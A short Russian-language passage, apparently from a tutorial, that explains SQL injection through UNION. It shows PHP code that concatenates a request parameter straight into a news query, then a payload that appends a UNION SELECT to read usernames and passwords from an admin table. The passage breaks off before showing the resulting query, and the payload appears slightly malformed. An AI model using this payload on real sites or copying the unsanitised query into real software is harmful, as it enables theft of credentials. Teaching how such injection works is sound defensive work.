Полная смена задачи через UNION
Логику кода:
$res = mysqli_query(
"SELECT id_news, header, body, author FROM news WHERE id_news = "
. $_REQUEST['id']);
Можно полностью поменять "добросив" второй запрос через UNION, передав в качестве параметра id строку:
-1 UNION SELECT 4 username, password,1 FROM admin,
в итоге мы получим запрос вида: